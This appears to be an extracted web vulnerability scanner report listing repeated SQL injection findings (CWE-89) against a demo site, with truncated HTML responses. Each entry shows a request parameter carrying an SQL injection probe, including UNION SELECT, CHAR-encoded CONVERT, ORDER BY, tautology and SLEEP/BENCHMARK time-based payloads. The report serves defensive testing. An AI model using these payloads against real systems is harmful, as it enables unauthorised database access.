href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #692\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(\n116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #693\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin\" or 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #694\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #695\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 6\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #696\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(\n116)+CHAR(69)+CHAR(65)+CHAR(113)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #697Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #698\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #699\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #700\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 14\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #701\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 8\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #702\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #703\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #704\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #705\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 11--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> 